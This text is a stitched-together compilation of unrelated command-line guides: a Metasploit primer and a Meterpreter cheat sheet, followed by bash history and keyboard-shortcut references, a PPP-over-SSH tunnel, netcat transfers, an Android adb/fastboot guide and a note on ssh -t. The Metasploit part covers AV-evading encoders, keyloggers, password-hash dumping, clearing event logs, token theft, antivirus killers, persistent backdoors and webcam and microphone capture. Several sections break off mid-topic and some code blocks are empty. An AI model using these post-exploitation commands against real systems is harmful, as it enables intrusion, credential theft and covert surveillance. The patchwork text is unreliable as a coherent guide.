First, you can use Metasploit from the command line, or in msfcli mode. Although it appears that when we are in the console that we are using the command line, we are actually using an interactive console with special keywords and commands. From the msfcli, we ARE actually using a Linux command line.
We can get the help screen for msfcli by typing:
kali > msfcli -h
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)
Now to execute an exploit from the msfcli, the syntax is simply:
kali > msfcli payload = rhost = lhost = E
Where E is short for execute.
In my tutorial on creating payloads to evade AV software, we are using the msfencode and msfpayload command in the command line (msfcli) mode.
The drawback to using the msfcli is that it is not as well-supported as the msfconsole, and you are limited to a single shell, making some of the more complex exploits impossible.
Armitage
If you want to use Metasploit with a GUI (graphical user interface), at least a couple of options are available. First, Raphael Mudge has developed the Armitage (presumably a reference to a primary character in the seminal cyberhacking science fiction work, Neuromancer—a must read for any hacker with a taste for science fiction).
To start Armitage in Kali, simply type:
kali > armitage
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)
If Armitage fails to connect, try these alternative commands:
kali > service start postgresql
kali > service start metasploit
kali > service stop metasploit
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)
Armitage is a GUI overlay on Metasploit that operates in a client/server architecture. You start Metasploit as a server and Armitage becomes the client, thereby giving you full access to Metasploit's features through a full featured—thought not completely intuitive—GUI. If you really need a GUI to feel comfortable, I don't want to discourage you from using Armitage, but mastering the command line is a necessity for any self-respecting hacker.
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)
Modules
Metasploit has six different types of modules. These are:
payloads
exploits
post
nops
auxiliary
encoders
Payloads are the code that we will leave behind on the hacked system. Some people call these listeners, rootkits, etc. In Metasploit, they are referred to as payloads. These payloads include command shells, Meterpreter, etc. The payloads can be staged, inline, NoNX (bypasses the No execute feature in some modern CPUs), PassiveX (bypasses restricted outbound firewall rules), and IPv6, among others.
Exploits are the shellcode that takes advantage of a vulnerability or flaw in the system. These are operating system specific and many times, service pack (SP) specific, service specific, port specific, and even application specific. They are classified by operating system, so a Windows exploit will not work in a Linux operating system and vice versa.
Post are modules that we can use post exploitation of the system.
Nops are short for No OPerationS. In x86 CPUs, it is usually indicated by the hex 0x90. It simply means "do nothing". This can be crucial in creating a buffer overflow. We can view the nops modules by using the show command.
msf > show nops
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)
Auxiliary includes numerous modules (695) that don't fit into any of the other categories. These include such things are fuzzers, scanners, denial of service attacks, and more. Check out my article on auxiliary modules for more in-depth information for this module.
Encoders are modules that enable us to encode our payloads in various ways to get past AV an other security devices. We can see the encoders by typing:
msf > show encoders
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)
As you can see, there are numerous encoders built into Metasploit. Once of my favorites is shikata_ga_nai, which allows us to to XOR the payload to help in making it undetectable by AV software and security devices.
Searching
Ever since Metasploit 4 was released, Metasploit has added search capabilities. Previously, you had to use the msfcli and grep to find the modules you were looking, but now Rapid7 has added the search keyword and features. The addition of the search capability was timely as Metasploit has grown dramatically, and simple eyeball searches and grep searches were inadequate to search over 1,400 exploits, for instance.
The search keyword enables us to do simple keyword searches, but it also allows us to be a bit more refined in our search as well. For instance, we can define what type of module we are searching for by using the type keyword.
msf > search type:exploit
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)
When we do so, Metasploit comes back with all 1,295 exploits. Not real useful.
If we know we want to attack a Sun Microsystems machine running Solaris (Sun's UNIX), we may want may to refine our search to only solaris exploits, we can then use platform keyword.
msf > search type:exploit platform:solaris
Hack Like a Pro: Metasploit for the Aspiring Hacker, Part 1 (Primer & Overview)
Now we have narrowed our search down to only those exploits that will work against a Solaris operating system.
To further refine our search, let's assume we want to attack the Solaris RPC (sunrpc) and we want to see only those exploits attacking that particular service. We can add the keyword "sunrpc" to our serach like below:
Step 1: Core Commands
? - help menu
background - moves the current session to the background
bgkill - kills a background meterpreter script
bglist - provides a list of all running background scripts
bgrun - runs a script as a background thread
channel - displays active channels
close - closes a channel
exit - terminates a meterpreter session
help - help menu
interact - interacts with a channel
irb - go into Ruby scripting mode
migrate - moves the active process to a designated PID
quit - terminates the meterpreter session
read - reads the data from a channel
run - executes the meterpreter script designated after it
use - loads a meterpreter extension
write - writes data to a channel
Step 2: File System Commands
cat - read and output to stdout the contents of a file
cd - change directory on the victim
del - delete a file on the victim
download - download a file from the victim system to the attacker system
edit - edit a file with vim
getlwd - print the local directory
getwd - print working directory
lcd - change local directory
lpwd - print local directory
ls - list files in current directory
mkdir - make a directory on the victim system
pwd - print working directory
rm - delete a file
rmdir - remove directory on the victim system
upload - upload a file from the attacker system to the victim
Step 3: Networking Commands
ipconfig - displays network interfaces with key information including IP address, etc.
portfwd - forwards a port on the victim system to a remote service
route - view or modify the victim routing table
Step 4: System Commands
clearav - clears the event logs on the victim's computer
drop_token - drops a stolen token
execute - executes a command
getpid - gets the current process ID (PID)
getprivs - gets as many privileges as possible
getuid - get the user that the server is running as
kill - terminate the process designated by the PID
ps - list running processes
reboot - reboots the victim computer
reg - interact with the victim's registry
rev2self - calls RevertToSelf() on the victim machine
shell - opens a command shell on the victim machine
shutdown - shuts down the victim's computer
steal_token - attempts to steal the token of a specified (PID) process
sysinfo - gets the details about the victim computer such as OS and name
Step 5: User Interface Commands
enumdesktops - lists all accessible desktops
getdesktop - get the current meterpreter desktop
idletime - checks to see how long since the victim system has been idle
keyscan_dump - dumps the contents of the software keylogger
keyscan_start - starts the software keylogger when associated with a process such as Word or browser
keyscan_stop - stops the software keylogger
screenshot - grabs a screenshot of the meterpreter desktop
set_desktop - changes the meterpreter desktop
uictl - enables control of some of the user interface components
Step 6: Privilege Escalation Commands
getsystem - uses 15 built-in methods to gain sysadmin privileges
Step 7: Password Dump Commands
hashdump - grabs the hashes in the password (SAM) file
Note that hashdump will often trip AV software, but there are now two scripts that are more stealthy, "run hashdump" and "run smart_hashdump". Look for more on those on my upcoming meterpreter script cheat sheet.
Step 8: Timestomp Commands
timestomp - manipulates the modify, access, and create attributes of a file
arp_scanner.rb - Script for performing an ARP's Scan Discovery.
autoroute.rb - Meterpreter session without having to background the current session.
checkvm.rb - Script for detecting if target host is a virtual machine.
credcollect.rb - Script to harvest credentials found on the host and store them in the database.
domain_list_gen.rb - Script for extracting domain admin account list for use.
dumplinks.rb - Dumplinks parses .lnk files from a user's recent documents folder and Microsoft Office's Recent documents folder, if present. The .lnk files contain time stamps, file locations, including share names, volume serial #s and more. This info may help you target additional systems.
duplicate.rb - Uses a meterpreter session to spawn a new meterpreter session in a different process. A new process allows the session to take "risky" actions that might get the process killed by A/V, giving a meterpreter session to another controller, or start a keylogger on another process.
enum_chrome.rb - Script to extract data from a chrome installation.
enum_firefox.rb - Script for extracting data from Firefox. enum_logged_on_users.rb - Script for enumerating current logged users and users that have logged in to the system. enum_powershell_env.rb - Enumerates PowerShell and WSH configurations.
enum_putty.rb - Enumerates Putty connections.
enum_shares.rb - Script for Enumerating shares offered and history of mounted shares.
enum_vmware.rb - Enumerates VMware configurations for VMware products.
event_manager.rb - Show information about Event Logs on the target system and their configuration.
file_collector.rb - Script for searching and downloading files that match a specific pattern.
get_application_list.rb - Script for extracting a list of installed applications and their version.
getcountermeasure.rb - Script for detecting AV, HIPS, Third Party Firewalls, DEP Configuration and Windows Firewall configuration. Provides also the option to kill the processes of detected products and disable the built-in firewall.
get_env.rb - Script for extracting a list of all System and User environment variables.
getfilezillacreds.rb - Script for extracting servers and credentials from Filezilla.
getgui.rb - Script to enable Windows RDP.
get_local_subnets.rb - Get a list of local subnets based on the host's routes.
get_pidgen_creds.rb - Script for extracting configured services with username and passwords.
gettelnet.rb - Checks to see whether telnet is installed.
get_valid_community.rb - Gets a valid community string from SNMP.
getvncpw.rb - Gets the VNC password.
hashdump.rb - Grabs password hashes from the SAM.
hostedit.rb - Script for adding entries in to the Windows Hosts file.
keylogrecorder.rb - Script for running keylogger and saving all the keystrokes.
killav.rb - Terminates nearly every antivirus software on victim.
metsvc.rb - Delete one meterpreter service and start another.
migrate - Moves the meterpreter service to another process.
multicommand.rb - Script for running multiple commands on Windows 2003, Windows Vistaand Windows XP and Windows 2008 targets.
multi_console_command.rb - Script for running multiple console commands on a meterpreter session.
multi_meter_inject.rb - Script for injecting a reverce tcp Meterpreter Payload into memory of multiple PIDs, if none is provided a notepad process will be created and a Meterpreter Payload will be injected in to each.
multiscript.rb - Script for running multiple scripts on a Meterpreter session.
netenum.rb - Script for ping sweeps on Windows 2003, Windows Vista, Windows 2008 and Windows XP targets using native Windows commands.
packetrecorder.rb - Script for capturing packets in to a PCAP file.
panda2007pavsrv51.rb - This module exploits a privilege escalation vulnerability in Panda Antivirus 2007. Due to insecure permission issues, a local attacker can gain elevated privileges.
persistence.rb - Script for creating a persistent backdoor on a target host.
pml_driver_config.rb - Exploits a privilege escalation vulnerability in Hewlett-Packard's PML Driver HPZ12. Due to an insecure SERVICE_CHANGE_CONFIG DACL permission, a local attacker can gain elevated privileges.
powerdump.rb - Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry keys. This script requires you to be running as system in order to work properly. This has currently been tested on Server 2008 and Windows 7, which installs PowerShell by default.
prefetchtool.rb - Script for extracting information from windows prefetch folder.
process_memdump.rb - Script is based on the paper Neurosurgery With Meterpreter.
remotewinenum.rb - This script will enumerate windows hosts in the target environment given a username and password or using the credential under which Meterpeter is running using WMI wmic windows native tool.
scheduleme.rb - Script for automating the most common scheduling tasks during a pentest. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
schelevator.rb - Exploit for Windows Vista/7/2008 Task Scheduler 2.0 Privilege Escalation. This script exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
schtasksabuse.rb - Meterpreter script for abusing the scheduler service in Windows by scheduling and running a list of command against one or more targets. Using schtasks command to run them as system. This script works with Windows XP, Windows 2003, Windows Vista and Windows 2008.
scraper.rb - The goal of this script is to obtain system information from a victim through an existing Meterpreter session.
screenspy.rb - This script will open an interactive view of remote hosts. You will need Firefox installed on your machine.
screen_unlock.rb - Script to unlock a windows screen. Needs system privileges to run and known signatures for the target system.
screen_dwld.rb - Script that recursively search and download files matching a given pattern.
service_manager.rb - Script for managing Windows services.
service_permissions_escalate.rb This script attempts to create a service, then searches through a list of existing services to look for insecure file or configuration permissions that will let it replace the executable with a payload. It will then attempt to restart the replaced service to run the payload. If that fails, the next time the service is started (such as on reboot) the attacker will gain elevated privileges.
sound_recorder.rb - Script for recording in intervals the sound capture by a target host microphone.
srt_webdrive_priv.rb - Exploits a privilege escalation vulnerability in South River Technologies WebDrive.
uploadexec.rb - Script to upload executable file to host.
virtualbox_sysenter_dos - Script to DoS Virtual Box.
virusscan_bypass.rb - Script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes.
vnc.rb - Meterpreter script for obtaining a quick VNC session.
webcam.rb - Script to enable and capture images from the host webcam.
win32-sshclient.rb - Script to deploy & run the "plink" commandline ssh-client. Supports only MS-Windows-2k/XP/Vista Hosts.
win32-sshserver.rb - Script to deploy and run OpenSSH on the target machine.
winbf.rb - Function for checking the password policy of current system. This policy may resemble the policy of other servers in the target environment.
winenum.rb - Enumerates Windows system including environment variables, network interfaces, routing, user accounts, etc
wmic.rb - Script for running WMIC commands on Windows 2003, Windows Vista and Windows XP and Windows 2008 targets.
- You can use $_ or !$ to recall the last argument of the previous command.
- Also, if you want an arbitrary argument, you can use !!:1, !!:2, etc. (!!:0 is the previous command itself.) !:1-2 !:10-12
- Similar to !$, you use !^ for the first argument.
- !$ - last argument from previous command
- !^ - first argument (after the program/built-in/script) from previous command
- !! - previous command (often pronounced "bang bang")
- !n - command number n from history
- !pattern - most recent command matching pattern
- !!:s/find/replace - last command, substitute find with replace
- Use following to take the second argument from the third command in the history,
!3:2
- Use following to take the third argument from the fifth last command in the history,
!-5:3
- !* runs a new command with all previous arguments.
Event Designators
An event designator is a reference to a command line entry in the history list. Unless the reference is absolute, events are relative to the current position in the history list.
!
Start a history substitution, except when followed by a space, tab, the end of the line, ‘=’ or ‘(’ (when the extglob shell option is enabled using the shopt builtin).
!n
Refer to command line n.
!-n
Refer to the command n lines back.
!!
Refer to the previous command. This is a synonym for ‘!-1’.
!string
Refer to the most recent command preceding the current position in the history list starting with string.
!?string[?]
Refer to the most recent command preceding the current position in the history list containing string. The trailing ‘?’ may be omitted if the string is followed immediately by a newline.
^string1^string2^
Quick Substitution. Repeat the last command, replacing string1 with string2. Equivalent to !!:s/string1/string2/.
!#
The entire command line typed so far.
Next: Modifiers, Previous: Event Designators, Up: History Interaction [Contents][Index]
9.3.2 Word Designators
Word designators are used to select desired words from the event. A ‘:’ separates the event specification from the word designator. It may be omitted if the word designator begins with a ‘^’, ‘$’, ‘*’, ‘-’, or ‘%’. Words are numbered from the beginning of the line, with the first word being denoted by 0 (zero). Words are inserted into the current line separated by single spaces.
For example,
!!
designates the preceding command. When you type this, the preceding command is repeated in toto.
!!:$
designates the last argument of the preceding command. This may be shortened to !$.
!fi:2
designates the second argument of the most recent command starting with the letters fi.
Here are the word designators:
0 (zero)
The 0th word. For many applications, this is the command word.
n
The nth word.
^
The first argument; that is, word 1.
$
The last argument.
%
The word matched by the most recent ‘?string?’ search.
x-y
A range of words; ‘-y’ abbreviates ‘0-y’.
*
All of the words, except the 0th. This is a synonym for ‘1-$’. It is not an error to use ‘*’ if there is just one word in the event; the empty string is returned in that case.
x*
Abbreviates ‘x-$’
x-
Abbreviates ‘x-$’ like ‘x*’, but omits the last word.
If a word designator is supplied without an event specification, the previous command is used as the event.
Modifiers
After the optional word designator, you can add a sequence of one or more of the following modifiers, each preceded by a ‘:’.
h
Remove a trailing pathname component, leaving only the head.
t
Remove all leading pathname components, leaving the tail.
r
Remove a trailing suffix of the form ‘.suffix’, leaving the basename.
e
Remove all but the trailing suffix.
p
Print the new command but do not execute it.
q
Quote the substituted words, escaping further substitutions.
x
Quote the substituted words as with ‘q’, but break into words at spaces, tabs, and newlines.
s/old/new/
Substitute new for the first occurrence of old in the event line. Any delimiter may be used in place of ‘/’. The delimiter may be quoted in old and new with a single backslash. If ‘&’ appears in new, it is replaced by old. A single backslash will quote the ‘&’. The final delimiter is optional if it is the last character on the input line.
&
Repeat the previous substitution.
g
a
Cause changes to be applied over the entire event line. Used in conjunction with ‘s’, as in gs/old/new/, or with ‘&’.
G
Apply the following ‘s’ modifier once to each word in the event.
PPP (Point to Point Protocol) is a mechanism for running IP (Internet Protocol) over a terminal. Usually the terminal is a modem, but any tty will do. SSH creates secure ttys. Running a PPP connection over an SSH connection makes for an easy, encrypted VPN. (SSH has native tunneling support which requires root access, this method only requires root privileges on the client.)
If you run any flavor of *nix (Free/Open/NetBSD, Linux, etc), chances are everything you need is already installed (ppp and ssh). and since SSH uses a single client/server TCP connection, it NATs cleanly, easily passing through firewalls and NAT routers. It has its drawbacks though as you have PPP (TCP) inside of SSH (TCP) which is a bad idea.
On the remote end, install pppd if not already installed,
apt-get install ipppd
Enable IP Forwarding by editing /proc/sys/net/ipv4/ip\forward
echo 1 > /proc/sys/net/ipv4/ip_forward
Configure your iptables settings to enable access for PPP Clients,
iptables -F FORWARD
iptables -A FORWARD -j ACCEPT
iptables -A POSTROUTING -t nat -o eth0 -j MASQUERADE
iptables -A POSTROUTING -t nat -o ppp+ -j MASQUERADE
And make sure you can login without a password.
On the local end, start pppd, tell it to connect using SSH in batch mode, start pppd on the remote server, and use the SSH connection as the communication channel.
When run, both your local and your remote computers will have new PPP network interfaces,
Local interface ppp0 with IP address 10.0.0.1
Remote interface ppp0 with IP address 10.0.0.2
Once pppd adds default route via ppp0 all traffic will be routed through the tunnel thus SSH will go down because OS will try to route the tunnel through the tunnel, to fix that we add a route to remote-host via local-gateway.
route add $remote gw $gateway
OS will send all SSH traffic to remote-host through our default gateway, so the tunnel keeps working fine, the rest of the traffic will go through the tunnel.
The script below automates all of the steps above, when run it will figure out the current gateway setup the tunnel and the routes so all traffic goes through the tunnel.
Netcat is like a swiss army knife for geeks. It can be used for just about anything involving TCP or UDP. One of its most practical uses is to transfer files. Non *nix people usually don't have SSH setup, and it is much faster to transfer stuff with netcat then setup SSH. netcat is just a single executable, and works across all platforms (Windows,Mac OS X, Linux).
On the receiving end running,
nc -l -p 1234 > out.file
will begin listening on port 1234.
On the sending end running,
nc -w 3 [destination] 1234 < out.file
will connect to the receiver and begin sending file.
For faster transfers if both sender and receiver has some basic *nix tools installed, you can compress the file during sending process,
A much cooler but less useful use of netcat is, it can transfer an image of the whole hard drive over the wire using a command called dd.
On the sender end run,
dd if=/dev/hda3 | gzip -9 | nc -l 3333
On the receiver end,
nc [destination] 3333 | pv -b > hdImage.img.gz
Be warned that file transfers using netcat are not encrypted, anyone on the network can grab what you are sending, so use this only on trusted networks.
WHAT IS ADB/FASTBOOT
ADB and fastboot commands on PC are used to perform different command line operations on device through USB in ROM/Recovery and bootloader mode respectively.
Android Debugging Bridge is basically used by developers to identify and fix bugs in OS (ROM). ADB works in ROM and recovery both.
Fastboot works in bootloader mode even when phone is not switched on in Recovery or ROM or even if android isn't installed on phone. In later case, bootloader can be accessed by certain button combination while powering on device; usually Power + Vol. Down.
Fastboot/ADB setup is to be made on PC to use this mode. ADB mode has more flexibility than fastboot as it supports more types of flashable files to be flashed. ADB also supports backing up Apps and Data. ADB/fastboot commands can be used to flash recovery and boot images. It can also flash ROM zip. It can flash supersu.zip by booting into recovery to gain root access. And above all, it is the only way to unlock bootloader without which the device functionality is too limited. Read here why we need to unlock bootloader.
In bootloader mode, usually boot logo appears on device screen.
SETUP
Enable USB Debugging in Settings > Developer Options. If not available, Dev. Options can be accessed by tapping 5 (or 7) times Build Number in Settings > About Phone.
Allow ADB root access in Dev. Options or SuperSU. Some commands need root.
Allow data transfer over ADB when prompted on device screen. Otherwise you might get errors like device unauthorized etc. So keep screen unlocked at first connect.
Disable MTP, PTP, UMS etc. from USB computer connection on device to avoid any interruptions.
Install Android SDK or simply install 15 Seconds ADB Setup 1.4.2. It works up to Android Lollipop (AOSP 5). Credits to Snoop05
Windows 8.1 users who got error installing this setup should first install Windows Update KB2917929.
You will have to navigate to adb folder each time you start cmd. Or setup adb to work globally. On your PC, go to System Properties > Advanced System Settings > Environment Variables. Click on New (User Variables). Variables Name: ADB ( Or anything you want). Variables Value: ;C:\adb (if installed 15 seconds setup) or ;C:\SDK\paltform-tools.
Install ADB USB Drivers for your Android Device. To do this automatically, download and run ADB Driver Installer. Connect device through USB cable and install drivers.
NOTE: Spaces in file paths don't work in adb commands. Non-English characters and languages don't work either. Also the commands are case-sensitive.
There is a long list of adb/fastboot commands to perform numerous operations. Here are a few of those being listed keeping in view certain tasks:
COMMON COMMANDS
On PC run Command Prompt as Administrator.
To check connected devices when ROM is running on phone:
Code:
adb devices
To boot into bootloader mode:
Code:
adb reboot bootloader
To check connected devices when in bootloader mode:
Code:
fastboot devices
To boot into ROM:
Code:
fastboot reboot
To boot into recovery:
Code:
fastboot reboot recovery
There are some common Linux commands which can be used in combination with these commands to perform certain operation. However, ADB | FASTBOOT is not necessarily required for these Linux commands. These can be run directly from Terminal Emulator in ROM or Custom Recovery. Some of them are given below.
UNLOCK BOOTLOADER
NOTE: Some newer devices don't allow unlocking of bootloader directly to ensure more security. Instead an official method is provided to unlock BL using PC.
Read here to know about the risks of BL unlocking.
To check the bootloader status:
Code:
fastboot oem device-info
“True” on unlocked status.
If "false", run the following to unlock:
Code:
fastboot oem unlock
FLASH RECOVERY
This will erase your data.
Code:
fastboot format:ext4 userdata
It can be performed on other flash partitions as well. A general syntax is 'fastboot format:FS PARTITION'
FLASH RECOVERY
Download recovery.img (specific for your device) to adb folder.
To test the recovery without permanently flashing, run the following:
Code:
fastboot boot recovery.img
On next reboot, recovery will be overwritten by previous recovery.
Or to permanently flash recovery, run:
Code:
Stock ROM's often tend to replace custom recovery with stock one on first reboot. That's why, booting into recovery is recommended before booting into ROM.
FLASH KERNEL
Download boot.img (specific for your device) to adb folder and run following:
Code:
fastboot flash boot boot.img
FLASH ROM
Download ROM.zip (for your device) created for fastboot i.e. with android-info.txt and android-product.txt.
To wipe your device and then to flash .zip:
Code:
fastboot -w
fastboot update
GAIN ROOT (Not recommended method. Better flash directly through custom recovery).
Root is required to modify the contents of /system. You can read here further.
Download (flashable) supersu.zip and custom or modified recovery.img (having support to flash .zip files) to adb folder and run the following:
Code:
fastboot boot recovery.img
Now once you are in recovery, adb will work instead of fastboot.
To copy files from PC to device and then to extract files, run the following:
Code:
COPY WHOLE PARTITION IMAGE (within device)
This method can be used to backup whole device e.g. to backup /data/ including /data/media/ i.e. Internal SD Card which isn't backed up by custom recovery (TWRP). Or you can get any partition image for development purpose. This method retains complete directory structure as well as file permissions, attributes and contexts.
To jump from windows command prompt to android device shell:
Code:
adb shell
These commands can also be given from Recovery Terminal instead of ADB.
To get SuperUser access (in ROM):
Code:
su
To list all available partitions or mount points on device:
Code:
cat /proc/partitions
Or go to "/dev/block/platform/" folder on device. Search for the folder having folder "by-name" inside it. It's msm_sdcc.1 (on Nokia X2). Run the following:
Code:
ls -al /dev/block/platform/*/by-name
Or simply use DiskInfo app to get partition name you want to copy. Say you want to copy /data (userdata) partition. On Nokia X2DS, it is mmcblk0p25.
To confirm:
Code:
data.img will be copied to your SD card.
It also works inversely (restore):
Code:
dd if=/sdcard/data.img of=/dev/block/mmcblk0p25
data.img from your SD card will be written to device.
Similarly you can copy system.img, boot.img or any other partition. However boot.img and other partitions may not be copied in ROM but in recovery mode only. So better use recovery for dd except if you're going to dd recovery partition itself. You can read here more about android partitions.
COPY WHOLE FOLDER (within device)
This method can be used to backup folders like /data/media/ which isn't backed up by custom recovery (TWRP).
To jump from windows command prompt to android device shell:
Code:
adb shell
These commands can also be given from Recovery Terminal.
To get SuperUser access (in ROM):
Code:
su
To copy from Internal Memory to SD Card:
Code:
cp -a /data/media/0/. /external_sd/internal_backup/
Or if you don't have SU permission:
Code:
cp -a /external_sd/. /sdcard/
To copy from SD Card to Internal Memory:
Code:
cp -a /external_sd/internal_backup/. /data/media/0/
However, if you are copying to an SD card with FAT32 file system, android permissions of files won't be retained and you would have to fix permissions yourself. In this case, you can use tar command to create archive of files along with their attributes ( permissions: mode & ownership + time-stamps) and security contexts etc. But FAT32 FS has also a limitations of 4GB maximum file size. You may use "split" command along with "tar" to split the archive in smaller blocks. Or use exFat or Ext4 filesystem for larger file support. Ext4 would give higher writing speed in Android but not supported in Windows i.e. SD card can't be mounted in Windows. MTP however works.
To jump from windows command prompt to android device shell:
Code:
adb shell
To get SuperUser access (in ROM):
Code:
su
To copy from Internal Memory to SD Card:
Code:
tar cvpf /external_sd/internal_backup/media.tar /data/media/0/
To extract from SD Card to Internal Memory (along with path):
Code:
tar -xvf /external_sd/internal_backup/media.tar
To extract from SD Card to some other location, use "-C":
Code:
tar -xvf /external_sd/internal_backup/media.tar -C /data/media/0/extracted_archive/
COPY WHOLE FOLDER (From/To PC)
This method can be used to backup folders like /data/media/ which isn't backed up by custom recovery (TWRP).
After copying from PC to device's Internal Memory (/data/media/), you might get Permission Denied error e.g. apps can't write or even read from Internal Memory. It's because Android (Linux) and Windows have different file permissions system. To FIX PERMISSIONS, boot into recovery and run following commands:
(Credits to xak944 )
Code:
adb shell
To take ownership of whole "media" directory:
Code:
chown -R media_rw:media_rw /data/media/
To fix permissions of directories:
Code:
find /data/media/ -type d -exec chmod 775 '{}' ';'
To fix permissions of files:
Code:
find /data/media/ -type f -exec chmod 664 '{}' ';'
PASSING FASTBOOT ARGUMENTS
Fastboot supports passing options. For example, while booting a modified kernel image with FramBuffer Console support, console device and its font can be provided as option:
Code:
Working With Processes
Use the following shortcuts to manage running processes.
Ctrl+C: Interrupt (kill) the current foreground process running in in the terminal. This sends the SIGINT signal to the process, which is technically just a request—most processes will honor it, but some may ignore it.
Ctrl+Z: Suspend the current foreground process running in bash. This sends the SIGTSTP signal to the process. To return the process to the foreground later, use the fg process_name command.
Ctrl+D: Close the bash shell. This sends an EOF (End-of-file) marker to bash, and bash exits when it receives this marker. This is similar to running the exit command.
Controlling the Screen
The following shortcuts allow you to control what appears on the screen.
Ctrl+L: Clear the screen. This is similar to running the “clear” command.
Ctrl+S: Stop all output to the screen. This is particularly useful when running commands with a lot of long, verbose output, but you don’t want to stop the command itself with Ctrl+C.
Ctrl+Q: Resume output to the screen after stopping it with Ctrl+S.
Moving the Cursor
Use the following shortcuts to quickly move the cursor around the current line while typing a command.
Ctrl+A or Home: Go to the beginning of the line.
Ctrl+E or End: Go to the end of the line.
Alt+B: Go left (back) one word.
Ctrl+B: Go left (back) one character.
Alt+F: Go right (forward) one word.
Ctrl+F: Go right (forward) one character.
Ctrl+XX: Move between the beginning of the line and the current position of the cursor. This allows you to press Ctrl+XX to return to the start of the line, change something, and then press Ctrl+XX to go back to your original cursor position. To use this shortcut, hold the Ctrl key and tap the X key twice.
Deleting Text
Use the following shortcuts to quickly delete characters:
Ctrl+D or Delete: Delete the character under the cursor.
Alt+D: Delete all characters after the cursor on the current line.
Ctrl+H or Backspace: Delete the character before the cursor.
Fixing Typos
These shortcuts allow you to fix typos and undo your key presses.
Alt+T: Swap the current word with the previous word.
Ctrl+T: Swap the last two characters before the cursor with each other. You can use this to quickly fix typos when you type two characters in the wrong order.
Ctrl+_: Undo your last key press. You can repeat this to undo multiple times.
Cutting and Pasting
Bash includes some basic cut-and-paste features.
Ctrl+W: Cut the word before the cursor, adding it to the clipboard.
Ctrl+K: Cut the part of the line after the cursor, adding it to the clipboard.
Ctrl+U: Cut the part of the line before the cursor, adding it to the clipboard.
Ctrl+Y: Paste the last thing you cut from the clipboard. The y here stands for “yank”.
Capitalizing Characters
The bash shell can quickly convert characters to upper or lower case:
Alt+U: Capitalize every character from the cursor to the end of the current word, converting the characters to upper case.
Alt+L: Uncapitalize every character from the cursor to the end of the current word, converting the characters to lower case.
Alt+C: Capitalize the character under the cursor. Your cursor will move to the end of the current word.
Tab Completion
RELATED: Use Tab Completion to Type Commands Faster on Any Operating System
Tab completion is a very useful bash feature. While typing a file, directory, or command name, press Tab and bash will automatically complete what you’re typing, if possible. If not, bash will show you various possible matches and you can continue typing and pressing Tab to finish typing.
Tab: Automatically complete the file, directory, or command you’re typing.
For example, if you have a file named really_long_file_name in /home/chris/ and it’s the only file name starting with “r” in that directory, you can type /home/chris/r, press Tab, and bash will automatically fill in /home/chris/really_long_file_name for you. If you have multiple files or directories starting with “r”, bash will inform you of your possibilities. You can start typing one of them and press “Tab” to continue.
Working With Your Command History
RELATED: How to Use Your Bash History in the Linux or macOS Terminal
You can quickly scroll through your recent commands, which are stored in your user account’s bash history file:
Ctrl+P or Up Arrow: Go to the previous command in the command history. Press the shortcut multiple times to walk back through the history.
Ctrl+N or Down Arrow: Go to the next command in the command history. Press the shortcut multiple times to walk forward through the history.
Alt+R: Revert any changes to a command you’ve pulled from your history if you’ve edited it.
Bash also has a special “recall” mode you can use to search for commands you’ve previously run:
Ctrl+R: Recall the last command matching the characters you provide. Press this shortcut and start typing to search your bash history for a command.
Ctrl+O: Run a command you found with Ctrl+R.
Ctrl+G: Leave history searching mode without running a command.
The primary difference is the concept of interactivity. It's similar to running commands locally inside of a script, vs. typing them out yourself. It's different in that a remote command must choose a default, and non-interactive is safest. (and usually most honest)
STDIN
If a PTY is allocated, applications can detect this and know that it's safe to prompt the user for additional input without breaking things. There are many programs that will skip the step of prompting the user for input if there is no terminal present, and that's a good thing. It would cause scripts to hang unnecessarily otherwise.
Your input will be sent to the remote server for the duration of the command. This includes control sequences. While a Ctrl-c break would normally cause a loop on the ssh command to break immediately, your control sequences will instead be sent to the remote server. This results in a need to "hammer" the keystroke to ensure that it arrives when control leaves the ssh command, but before the next ssh command begins.
I would caution against using ssh -t in unattended scripts, such as crons. A non-interactive shell asking a remote command to behave interactively for input is asking for all kinds of trouble.
You can also test for the presence of a terminal in your own shell scripts. To test STDIN with newer versions of bash:
# fd 0 is STDIN
[ -t 0 ]; echo $?
STDOUT
When aliasing ssh to ssh -t, you can expect to get an extra carriage return in your line ends. It may not be visible to you, but it's there; it will show up as ^M when piped to cat -e. You must then expend the additional effort of ensuring that this control code does not get assigned to your variables, particularly if you're going to insert that output into a database.
There is also the risk that programs will assume they can render output that is not friendly for file redirection. Normally if you were to redirect STDOUT to a file, the program would recognize that your STDOUT is not a terminal and omit any color codes. If the STDOUT redirection is from the output of the ssh client and the there is a PTY associated with the remote end of the client, the remote programs cannot make such a distinction and you will end up with terminal garbage in your output file. Redirecting output to a file on the remote end of the connection should still work as expected.
Here is the same bash test as earlier, but for STDOUT:
# fd 1 is STDOUT
[ -t 1 ]; echo $?
While it's possible to work around these issues, you're inevitably going to forget to design scripts around them. All of us do at some point. Your team members may also not realize/remember that this alias is in place, which will in turn create problems for you when they write scripts that use your alias.
Aliasing ssh to ssh -t is very much a case where you'll be violating the design principle of least surprise; people will be encountering problems they do not expect and may not understand what is causing them.
SSH escape characters and transfer of binary files
One advantage that hasn’t been mentioned in the other answers is that when operating without a pseudo-terminal, the SSH escape characters such as ~C are not supported; this makes it safe for programs to transfer binary files which may contain these sequences.
Proof of concept
Copy a binary file using a pseudo-terminal:
$ ssh -t anthony@remote_host 'cat /usr/bin/free' > ~/free
Connection to remote_host closed.
Copy a binary file without using a pseudo-terminal:
$ ssh anthony@remote_host 'cat /usr/bin/free' > ~/free2
The two files aren’t the same:
$ diff ~/free*
Binary files /home/anthony/free and /home/anthony/free2 differ
The one which was copied with a pseudo-terminal is corrupted:
$ chmod +x ~/free*
$ ./free
Segmentation fault
while the other isn’t:
$ ./free2
total used free shared buffers cached
Mem: 2065496 1980876 84620 0 48264 1502444
